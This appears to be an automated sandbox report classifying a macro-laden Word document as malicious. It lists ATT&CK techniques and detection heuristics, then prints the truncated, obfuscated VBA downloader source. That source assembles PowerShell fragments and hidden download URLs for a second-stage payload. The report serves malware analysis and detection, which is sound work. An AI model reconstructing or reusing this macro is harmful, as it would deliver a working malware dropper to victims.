Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function, indicating an attempt to execute external code. The macro constructs a URL, likely for downloading a second-stage payload. The presence of a password-protected archive lure heuristic suggests the document's purpose is to trick the user into opening an encrypted file, which is a common tactic for bypassing security controls.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscation-6387400-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://gXw+gXwtagXw+gXwswines.co (in document text, OLE body)
  - URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 84063 bytes | e16455f4221bb363cee00e629f3a88cf5b384e7889854b00aee5a212b80d8581 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HpaCWEKWi"
Function wbGowvEQG()
jMhKzt = Array(StrReverse("oLGXEAjqiE"), StrReverse("jqaWvnIufr"), StrReverse("phbrROzqiG"), StrReverse("JBkTTumHkc"), StrReverse("DsrSTVkrwN"), StrReverse("obZhnHkOGq"), StrReverse("DqLcuiFGCB"), StrReverse("ABKDnwpIYw"))
lVPYXfAmZC = Mid("Y+3MgXw+gXwciligXw+gXwk.gXw+gXwxyz/gXw3'+'Mg+3M'+'g+gXwSkRagptgXw+gX3Mg+3MgwdGgXw+gXw/,gXw+gXwhttp:gXw+gXw//rgXw+gXwandevu-gXw+gXwdk.rgX3Mg+3Mgw+gXwu'+'/q3Mg+3Mg/gXw+gXw,ht3Mg+3Mgtp://sagXw+gXwlgXuMv1FrYS60", 2, 195)
BpBcRXwONUS = Array(StrReverse("kUKwEPuiTo"), StrReverse("AFMGtKhttj"), StrReverse("kFNBBvJBAd"), StrReverse("MPWmjqzWfB"), StrReverse("jnjIcZHzuc"), StrReverse("ZLifDfGJwI"), StrReverse("FsipckjaWC"), StrReverse("LKOsAwVFYc"))
twStRjJzrpj = Array(StrReverse("dFtRSibCjM"), StrReverse("JXAtZNjPYl"), StrReverse("PiovMmQWtq"), StrReverse("RcqKNzwuJL"), StrReverse("GDZqrdAQia"), StrReverse("QaknhwQwFf"), StrReverse("SFJquhhqjb"), StrReverse("RmFNiMEwEj"))
ioXOW = Array(StrReverse("juDjCYOAjS"), StrReverse("DYfUiTkEwh"), StrReverse("OiqspODMXV"), StrReverse("iwhUPbRNFw"), StrReverse("zDjSYOYzIC"), StrReverse("hsUaaCDKqo"), StrReverse("UCdOoGrKFH"), StrReverse("BXzChLuYUa"))
zAEZZvWSqU = Mid("ZVaBzZ3AWYuWDX3Kiww-object randomgXw+3Mg+3MggXw;O3Mg+3MggXw+gXwAYbcd = taYhttp://gXw+gXwtagXw+gXwswines.co'+'.uk/AgXw+gXwFh/,htgXw+'+'gXwtp:gXw+gXw/gXw+gXwPm2HanXclsu4wnmtPTzQ7", 18, 138)
OuzhKTW = Array(StrReverse("lzrTZqsCdO"), StrReverse("jwpitBtivK"), StrReverse("wKkCIdVWJV"), StrReverse("uStWtSNpQD"), StrReverse("oiNSvTzbTc"), StrReverse("SVDtmbPoKw"), StrReverse("VVtIUOETkb"), StrReverse("nDSrVRzSHp"))
aioEDvUTd = Array(StrReverse("qFDUnlcHtM"), StrReverse("XHWRbwaViS"), StrReverse("XOsBAJsSsP"), StrReverse("IfqQwOzIaC"), StrReverse("djQskuAiak"), StrReverse("kYuCCcMCUd"), StrReverse("sKOiErQFSM"), StrReverse("zSvboozARG"))
ELsVQow = Array(StrReverse("oiBrvTAMkG"), StrReverse("nolmNoCtFV"), StrReverse("oDXqXFYrmb"), StrReverse("LcbjYcQjDY"), StrReverse("ozpVnKcAHz"), StrReverse("wINjzkHKUq"), StrReverse("uIZJuLNCOk"), StrReverse("XTqjhpOBDM"))
NjLrtmGcvoC = Mid("VTdTLivUVzjn984Qw+0wjh2nSiJt9r5I1", 17, 2)
DpJSAIJu = Array(StrReverse("JKrIfklnNW"), StrReverse("BzowJSUmos"), StrReverse("duPNmSdSNO"), StrReverse("iMlNUiTGzU"), StrReverse("GcswLAiwRW"), StrReverse("TLMYcOuiVM"), StrReverse("GSawrpLabb"), StrReverse("zOmUlACSCm"))
zAkpHhk = Array(StrReverse("cYkpdDOvlo"), StrReverse("VGOMifZjac"), StrReverse("zamWZiRjzH"), StrReverse("WFHHNWYjfr"), StrReverse("wSQZPREiCB"), StrReverse("PhbaPClNQz"), StrReverse("livdSQzHzH"), StrReverse("HpBiffJMHI"))
DdJlNuqAd = Array(StrReverse("DLRdbVUzSz"), StrReverse("pUtTWCjGWK"), StrReverse("rKNUGkWawq"), StrReverse("sSLGNvSIhw"), StrReverse("rHtJSqfjIJ"), StrReverse("TcTNFtzwWr"), StrReverse("zuAbEXImFa"), StrReverse("jYYaTjRDBQ"))
kwHZRoU = Mid("uO2rX476l6cXw +gXw+gXw tagXw+gXwYm2CtaY + OAYkgXw+gXwargnn", 12, 45)
kizNO = Array(StrReverse("ZniwsodjsK"), StrReverse("kKTjGOWmHz"), StrReverse("Sziutajtuk"), StrReverse("sZFIZwDzld"), StrReverse("mSOoWwWUcR"), StrReverse("IXEIqcIjER"), StrReverse("HklIRLELHI"), StrReverse("KYAiMzjqYz"))
PipKGCXI = Array(StrReverse("EqSmXQwwBU"), StrReverse("wVlqzzGRFv"), StrReverse("htaiZuEttV"), StrReverse("btvGmJbOEo"), StrReverse("ZKklcNnidW"), StrReverse("dzwGiKPkMc"), StrReverse("MEEfsEaiDn"), StrReverse("VsMRVXIpGM"))
Ujbok = Array(StrReverse("sCrkswcvbV"), StrReverse("ANNictisCa"), StrReverse("PrdDTulVSX"), StrReverse("znjwPmXTVa"), StrReverse("qSYmlTKnzV"), StrReverse("SJAUJBZnQz"), StrReverse("NHcEYNjQPp"), StrReverse("WOXbjwSqSA"))
WOjUzTGfzat = Mid("nuMsGPrzJi59bhWKJCsYIEdPt .( $ShELLII63Ft9iYXSQj", 26, 11)
kWBCRnvF = Array(StrReverse("HVQWsbvoYb"), StrReverse("trBccUFFsX"), StrReverse("nIfpBknjkK"), StrReverse("CZdAUqoinQ"), StrReverse("ImGbudrkpA"), StrRev
... (truncated)